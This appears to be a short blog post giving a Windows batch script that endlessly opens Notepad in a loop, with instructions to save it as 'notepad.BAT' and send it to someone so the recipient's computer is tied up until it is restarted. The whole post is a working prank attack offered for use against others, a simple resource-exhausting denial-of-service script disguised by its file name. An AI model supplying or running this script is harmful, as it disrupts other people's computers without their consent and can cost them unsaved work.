OPEN NOTEPAD CONTINUOUSLY
Type the code in notepad as :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “notepad.BAT” and send it.
Now double clik on this file to open..It will open continously,n finally u dont hv any option than to restart pc
No comments:
Post a Comment